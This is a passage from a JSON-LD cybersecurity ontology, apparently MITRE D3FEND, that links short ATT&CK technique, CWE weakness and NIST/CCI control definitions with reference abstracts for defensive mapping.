        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization provides the capability to expeditiously disconnect or disable remote access to the information system within the organization-defined time period.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002322"
    },
    {
      "@id": "d3f:T1634.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1634.001",
      "d3f:definition": "Adversaries may collect keychain data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.",
      "rdfs:label": "Keychain - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1634"
      },
      "skos:prefLabel": "Keychain"
    },
    {
      "@id": "d3f:CWE-1250",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1250",
      "d3f:definition": "The product has or supports multiple distributed components or sub-systems that are each required to keep their own local copy of shared data - such as state or cache - but the product does not ensure that all local copies remain consistent with each other.",
      "rdfs:label": "Improper Preservation of Consistency Between Independent Representations of Shared State",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-3_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Maintenance Tools | Software Updates and Patches",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-3(6)"
    },
    {
      "@id": "d3f:T1588.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.006",
      "d3f:definition": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)",
      "rdfs:label": "Vulnerabilities",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:Reference-PLX3x-Series-Multi-Protocol-Gateways",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.prosoft-technology.com/prosoft/download/9671/182665/file/PLX3x_UserManual"
      },
      "d3f:kb-abstract": "This document explains the features of the PLX3x gateway. It guides you through\nconfiguration, showing how to map data between a device or network, through the\ngateway, to a PLC or PAC. The ProSoft Configuration Builder software creates files to\nimport into the PLC or PAC programming software, integrating the gateway into your\nsystem. You can also map data between areas in the gateway's internal database. This\nallows you to copy data to different addresses within the gateway database in order to\ncreate easier data requests and control.\nThe PLX3x gateways are stand-alone DIN-rail mounted units that provide one Ethernet\nport for communications, remote configuration, and diagnostics. Your specific gateway\nmay include additional ports depending on the supported protocols. The gateway has an\nSD Card slot (SD card optional) that allows you to store configuration files that you can\nuse for recovery, transferring the configuration to another gateway, or general\nconfiguration backup.",
      "d3f:kb-organization": "ProSoft Technology",
      "d3f:kb-reference-of": {
        "@id": "d3f:OTVariableAccessRestriction"
      },
      "d3f:kb-reference-title": "PLX3x Series Multi-Protocol Gateways",
      "rdfs:label": "Reference - PLX3x Series Multi-Protocol Gateways"
    },
    {
      "@id": "d3f:CCI-001812_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prohibits user installation of software without explicit privileged status.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-01T00:00:00"
      },
      "rdfs:label": "CCI-001812"
    },
    {
      "@id": "d3f:CWE-1064",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1064",
      "d3f:definition": "The product contains a function, subroutine, or method whose signature has an unnecessarily large number of parameters/arguments.",
      "rdfs:label": "Invokable Control Element with Signature Containing an Excessive Number of Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:ID3",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ID3",
      "d3f:definition": "ID3 stands for Iterative Dichotomiser 3 and is named such because the algorithm iteratively (repeatedly) dichotomizes(divides) features into two or more groups at each step.",
      "d3f:kb-article": "## Addtional Consiterations\nID3 is the basis of C4.5, and is best used in natural language processing.\n\n## References\nDecision Trees for Classification: ID3 Algorithm Explained. Towards Data Science. [Link](https://towardsdatascience.com/decision-trees-for-classification-id3-algorithm-explained-89df76e72df1).",
      "rdfs:label": "ID3",
      "rdfs:subClassOf": {
        "@id": "d3f:DecisionTree"
      }
    },
    {
      "@id": "d3f:Reference-ThePyramidOfPain-DavidBianco",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html"
      },
      "d3f:kb-abstract": "This article identifies progressive levels of adversary difficulty encountered for various types of indicators.",
      "d3f:kb-author": "David Bianco",
      "d3f:kb-reference-of": {
        "@id": "d3f:IdentifierActivityAnalysis"
      },
      "d3f:kb-reference-title": "The Pyramid of Pain",
      "rdfs:label": "Reference - The Pyramid of Pain - David Bianco"
    },
    {
      "@id": "d3f:CWE-624",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-624",
      "d3f:definition": "The product uses a regular expression that either (1) contains an executable component with user-controlled inputs, or (2) allows a user to enable execution by inserting pattern modifiers.",
      "rdfs:label": "Executable Regular Expression Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-77"
      }
    },
    {
      "@id": "d3f:Reference-SiteIsolationDesignDocument",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.chromium.org/developers/design-documents/site-isolation/"
      },
      "d3f:kb-abstract": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "The Chromium Projects",
      "d3f:kb-reference-of": {
        "@id": "d3f:Application-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Site Isolation Design Document",
      "rdfs:label": "Reference - Site Isolation Design Document"
    },
    {
      "@id": "d3f:T1168",
      "@type": "owl:Class",
      "d3f:attack-id": "T1168",
      "d3f:definition": "On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1053",
      "rdfs:label": "Local Job Scheduling",
      "rdfs:seeAlso": {
        "@id": "d3f:T1053"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-91",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-91",
      "d3f:definition": "The product does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system.",
      "rdfs:label": "XML Injection (aka Blind XPath Injection)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-011%3ARegistryEditFromScreensaver",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-011/"
      },
      "d3f:kb-abstract": "Adversaries may use screensaver files to run malicious code. This analytic triggers on suspicious edits to the screensaver registry keys, which dictate which .scr file the screensaver runs.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserSessionInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-011: Registry Edit from Screensaver",
      "rdfs:label": "Reference - CAR-2020-11-011: Registry Edit from Screensaver"
    },
    {
      "@id": "d3f:TCPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Transmission Control Protocol (TCP), providing reliable, ordered, and error-checked delivery of data between applications.",
      "rdfs:label": "TCP Event",
      "rdfs:subClassOf": {
        "@id": "d3f:TransportLayerEvent"
      }
    },
    {
      "@id": "d3f:ApplicationConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information used to configure the parameters and initial settings for an application.",
      "rdfs:label": "Application Configuration",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/05739724-n"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:Reference-UsingSpanningTreeProtocolSTPToEnhanceLayer2NetworkTopologyMaps",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8045488B2"
      },
      "d3f:kb-abstract": "Spanning Tree Protocol (STP) data is obtained via network switch (SNMP) queries to enhance identification of switch-to-switch links in Layer-2 mapping. In particular, by analyzing the STP data, ambiguity in determining switch uplink ports may be reduced. Specifically, the STP data can be used in conjunction with other topography data to provide Layer-2 connectivity for nodes on a network topology. Layer-2 address mapping tables are collected from a topology mapping, and STP data is collected, along with address translation tables (ARP) tables. Using this information, switches are identified using Layer-2 address tables. The STP data can be correlated by comparing data in switches, identifying switch ports directly connected to other switch ports, and eliminating direct switch-to-switch port connections from consideration for further Layer-2 node mappings.",
      "d3f:kb-author": "Michael Jon Swan",
      "d3f:kb-organization": "SolarWinds Worldwide LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:ActivePhysicalLinkMapping"
      },
      "d3f:kb-reference-title": "Using spanning tree protocol (STP) to enhance layer-2 topology maps",
      "rdfs:label": "Reference - Using spanning tree protocol (STP) to enhance layer-2 topology maps"
    },
    {
      "@id": "d3f:may-map",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-map",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1020.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1020.001",
      "d3f:definition": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)",
      "rdfs:label": "Traffic Duplication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1020"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-11_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Testing and Evaluation | Static Code Analysis",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:ApplicationHardening"
      },
      "rdfs:label": "SA-11(1)"
    },
    {
      "@id": "d3f:CWE-1335",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1335",
      "d3f:definition": "An integer value is specified to be shifted by a negative amount or an amount greater than or equal to the number of bits contained in the value causing an unexpected or indeterminate result.",
      "rdfs:label": "Incorrect Bitwise Shift of Integer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:CWE-93",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-93",
      "d3f:definition": "The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.",
      "rdfs:label": "Improper Neutralization of CRLF Sequences ('CRLF Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:Reference-CyberVaccineAndPredictiveMalwareDefensiveMethodsAndSystems",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10848519B2/"
      },
      "d3f:kb-abstract": "Methods and systems for Predictive Malware Defense (PMD) are described. The systems and methods can utilize advanced machine-learning (ML) techniques to generate malware defenses preemptively. Embodiments of PMD can utilize models, which are trained on features extracted from malware families, to predict possible courses of malware evolution. PMD captures these predicted future evolutions in signatures of as yet unseen malware variants to function as a malware vaccine. These signatures of predicted future malware “evolutions” can be added to the training set of a machine-learning (ML) based malware detection and/or mitigation system so that it can detect these new variants as they arrive.",
      "d3f:kb-author": "Michael Howard, Avi Pfeifer, Mukesh Dalal, Michael Reposa",
      "d3f:kb-organization": "Charles River Analytics Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileContentAnalysis"
      },
      "d3f:kb-reference-title": "Cyber vaccine and predictive-malware-defense methods and systems",
      "rdfs:label": "Reference - Cyber vaccine and predictive-malware-defense methods and systems"
    },
    {
      "@id": "d3f:evaluated-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x evaluated-by y: The entity x is assessed and analyzed by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:evaluates"
      },
      "rdfs:label": "evaluated-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1120",
      "@type": "owl:Class",
      "d3f:attack-id": "T1120",
      "d3f:definition": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.",
      "rdfs:label": "Peripheral Device Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:EX-0013",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0013",
      "d3f:definition": "Flooding overwhelms a communication or processing path by injecting traffic at rates or patterns the system cannot comfortably absorb. In space contexts this can occur across layers: RF/optical links (continuous carriers, wideband noise, or protocol-shaped bursts); link/protocol layers (valid-looking frames at excessive cadence); application layers (command and telemetry messages that saturate parsers and queues); and internal vehicles buses where repeated messages starve critical publishers. Effects range from outright denial of service, dropped commands, lost telemetry, missed windows, to subtler corruption, such as out-of-order processing, watchdog trips, or autonomy entering protective modes due to backlogged health data. Secondary impacts include power and thermal strain as decoders, modems, or software loops spin at maximum duty, storage filling from retries, and control loops jittering when their messages are delayed. Timing matters: floods during handovers, maneuvers, or safing transitions can magnify consequences because margins are thinnest.",
      "rdfs:label": "Flooding - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0013/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Flooding"
    },
    {
      "@id": "d3f:Reference-HowDoesAntivirusQuarantineWork-SafetyDetectives",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.safetydetectives.com/blog/how-does-antivirus-quarantine-work/"
      },
      "d3f:kb-abstract": "Your antivirus has just finished a regular scan and it’s asking whether you want to quarantine the virus it’s found. You click ‘yes’ without putting much thought into what’s actually happening. But what does quarantining actually mean, what does it do and is it safe for your computer? It’s important to understand the details so that you know what’s happening when you send infected files into quarantine.",
      "d3f:kb-author": "Katarina Glamoslija",
      "d3f:kb-reference-title": "How Does Antivirus Quarantine Work?",
      "rdfs:label": "Reference - How Does Antivirus Quarantine Work? - Safety Detectives"
    },
    {
      "@id": "d3f:T1059.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.007",
      "d3f:definition": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)",
      "rdfs:label": "JavaScript",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:T1087.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1087.004",
      "d3f:definition": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.",
      "d3f:enumerates": {
        "@id": "d3f:CloudUserAccount"
      },
      "rdfs:label": "Cloud Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1087"
        },
        {
          "@id": "_:N056883a4ef324443af846bebde5f8ab5"
        }
      ]
    },
    {
      "@id": "_:N056883a4ef324443af846bebde5f8ab5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudUserAccount"
      }
    },
    {
      "@id": "d3f:OutputDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing the activity or state of output devices, including sound cards, display adapters, or media controllers. These events relate to audio, video, or graphics functionality.",
      "rdfs:label": "Output Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N8e05556262a04b499f4ee4ee60bd5525"
        }
      ]
    },
    {
      "@id": "_:N8e05556262a04b499f4ee4ee60bd5525",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutputDevice"
      }
    },
    {
      "@id": "d3f:OTDisconnectRemoteConnectionCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "The Disconnect Request message is sent to the message receiver to indicate that the transmitter is terminating its TCP socket.",
      "rdfs:label": "OT Disconnect Remote Connection Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTConnectionCommandEvent"
        },
        {
          "@id": "_:Ne85ddf9c7ae6460db2d69d2562a56083"
        },
        {
          "@id": "_:Nbe4488f5304843328ca462dc3aa69f2d"
        }
      ]
    },
    {
      "@id": "_:Ne85ddf9c7ae6460db2d69d2562a56083",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDisconnectRemoteConnectionCommand"
      }
    },
    {
      "@id": "_:Nbe4488f5304843328ca462dc3aa69f2d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEstablishRemoteConnectionCommandEvent"
      }
    },
    {
      "@id": "d3f:SMBEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Server Message Block (SMB) protocol, a network file sharing protocol that allows client-server communication for accessing files, printers, and other shared network resources. SMB supports both transactional file operations and communication over reliable transport layers.",
      "rdfs:label": "SMB Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/smb_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:Na4dcf91dda404cf79ccbfdb54482596a"
        }
      ]
    },
    {
      "@id": "_:Na4dcf91dda404cf79ccbfdb54482596a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileTransferNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1562.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.001",
      "d3f:definition": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)",
      "d3f:disables": {
        "@id": "d3f:OperatingSystemProcess"
      },
      "rdfs:label": "Disable or Modify Tools",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:Ne17396790ec94845a60f9526c5f28648"
        }
      ]
    },
    {
      "@id": "_:Ne17396790ec94845a60f9526c5f28648",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemProcess"
      }
    },
    {
      "@id": "d3f:M1034",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:IOPortRestriction"
      },
      "rdfs:label": "Limit Hardware Installation"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SC-3_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Security Function Isolation | Hardware Separation",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutionIsolation"
      },
      "rdfs:label": "SC-3(1)"
    },
    {
      "@id": "d3f:CWE-1204",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1204",
      "d3f:definition": "The product uses a cryptographic primitive that uses an Initialization Vector (IV), but the product does not generate IVs that are sufficiently unpredictable or unique according to the expected cryptographic requirements for that primitive.",
      "rdfs:label": "Generation of Weak Initialization Vector (IV)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:IsolationEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event involving actions to create logical or physical barriers that isolate compromised components, preventing adversary movement and reducing attack surfaces.",
      "d3f:related": {
        "@id": "d3f:Isolate"
      },
      "rdfs:label": "Isolation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SecurityEvent"
      }
    },
    {
      "@id": "d3f:ServiceApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application that provides a set of software functionalities so that multiple clients who can reuse the functionality, provided they are authorized for use of the service.",
      "rdfs:label": "Service Application",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Server_(computing)"
        },
        {
          "@id": "dbr:Service_(systems_architecture)"
        },
        {
          "@id": "https://schema.ocsf.io/objects/service"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:FileHeaderBlock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Headers are sections of a file that organize and provide information about specific sections or components of the file. Typically found at the beginning of a file, they often contain file type identification, version information, and metadata such as size, format, and encoding.",
      "rdfs:label": "File Header Block",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:T1027.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1027.002",
      "d3f:definition": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)",
      "d3f:obfuscates": {
        "@id": "d3f:ExecutableFile"
      },
      "rdfs:label": "Software Packing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1027"
        },
        {
          "@id": "_:N39c52585e9ef4280a183acb466f6091c"
        }
      ]
    },
    {
      "@id": "_:N39c52585e9ef4280a183acb466f6091c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:obfuscates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:may-deceive",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may deceive",
      "rdfs:label": "may-deceive",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter-attack"
      }
    },
    {
      "@id": "d3f:SupplyChainAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who exploits vulnerabilities in the supply chain to compromise systems or data.",
      "rdfs:label": "Supply Chain Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Attacker"
        },
        {
          "@id": "_:N8ffcd7b55fa14657bbcdc8ed8ca4e884"
        }
      ]
    },
    {
      "@id": "_:N8ffcd7b55fa14657bbcdc8ed8ca4e884",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:has-input",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-input y: An event x has input y iff y is an artifact that is present at the start of x, provides material or information required for x to begin, and during x either y's state is altered or the information content it bears is realized.",
      "owl:inverseOf": {
        "@id": "d3f:input-of"
      },
      "rdfs:domain": {
        "@id": "d3f:Event"
      },
      "rdfs:label": "has-input",
      "rdfs:range": {
        "@id": "d3f:Artifact"
      },
      "rdfs:seeAlso": [
        {
          "@id": "http://purl.obolibrary.org/obo/RO_0002233"
        },
        {
          "@id": "https://www.commoncoreontologies.org/ont00001921"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:has-participant"
      }
    },
    {
      "@id": "d3f:CCI-001147_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs, at a minimum, FIPS-validated cryptography to protect information when such information must be separated from individuals who have the necessary clearances yet lack the necessary access approvals.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001147"
    },
    {
      "@id": "d3f:HostConfigurationSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Collects the configuration data on an endpoint.",
      "d3f:monitors": [
        {
          "@id": "d3f:ApplicationConfiguration"
        },
        {
          "@id": "d3f:OperatingSystemConfiguration"
        }
      ],
      "rdfs:label": "Host Configuration Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:N6fe23e18c2634394b7a93584e4331d4c"
        },
        {
          "@id": "_:N26a1d90337ad42888cabddffa879b522"
        }
      ]
    },
    {
      "@id": "_:N6fe23e18c2634394b7a93584e4331d4c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "_:N26a1d90337ad42888cabddffa879b522",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfiguration"
      }
    },
    {
      "@id": "d3f:T1098.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1098.003",
      "d3f:definition": "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)",
      "d3f:modifies": {
        "@id": "d3f:GlobalUserAccount"
      },
      "rdfs:label": "Additional Cloud Roles",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1098"
        },
        {
          "@id": "_:N8ca8eb1eaf0347d08609965b07f2a28a"
        }
      ]
    },
    {
      "@id": "_:N8ca8eb1eaf0347d08609965b07f2a28a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GlobalUserAccount"
      }
    },
    {
      "@id": "d3f:GNSSSatellite",
      "@type": "owl:Class",
      "d3f:definition": "A GNSS satellite is part of a space-based constellation that transmits signals, allowing receivers on Earth to determine their position, navigation, and timing (PNT) through trilateration.",
      "rdfs:label": "GNSS Satellite",
      "rdfs:seeAlso": {
        "@id": "dbr:Satellite_navigation"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Satellite"
        },
        {
          "@id": "_:N8232e9829d3a44c5be3affdd1265aaf2"
        },
        {
          "@id": "_:N9a3d6628c39844a28e446c640e0403b1"
        }
      ]
    },
    {
      "@id": "_:N8232e9829d3a44c5be3affdd1265aaf2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AtomicClock"
      }
    },
